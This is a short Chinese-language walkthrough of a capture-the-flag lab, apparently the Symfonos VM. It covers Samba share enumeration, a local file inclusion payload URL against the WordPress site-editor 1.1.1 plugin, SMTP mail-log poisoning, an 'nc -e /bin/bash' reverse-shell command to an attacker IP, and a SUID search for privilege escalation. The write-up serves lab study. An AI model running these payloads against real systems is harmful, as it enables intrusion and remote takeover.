0x01 信息收集阶段

1.arp-scan -l 扫描主机【IP以实际IP为准】

2.nmap扫描端口，发现smtp,http，samba服务开放

登录web

3.-L：显示服务器端所分享出来的所有资源；发现共享文件helios和anonymous

0x02 渗透测试阶段

4.指定anonymous用户以guest身份登录

ls发现存在attention.txt文件，get下载文件 查看attention.txt发现三个疑似密码epliioko qwerty baseball

5.指定helios用户登录

发现存在research.txt和todo.txt文件，下载到本地

6.查看todo.txt，发现疑似url路径

7.尝试登录url路径

修改/etc/hosts文件，添加一行解析

发现可以正常访问

8.wpscan工具扫描

因为工具需要联网，场景中不能使用。直接给出结果，扫描到存在site-editor插件，版本1.1.1

wpscan --url http://symfonos.local/h3l105/ --enumeratep,t,tt,cb,dbe,u,m

9、site-editor存在文件包含漏洞，输入payload

http://<host>/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

10.通过telnet连接smtp25端口，发送php文件。

11.测试是否发送成功

http://<host>/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?=/var/mail/helios&c=id

12.反弹shell

&c=nc -e /bin/bash 10.10.210.199 7777

13.攻击机监听获得shell

0x02 提权阶段

14.查找suid文件

find / -perm -u=s 2>/dev/null

15.提权

16.寻找flag文件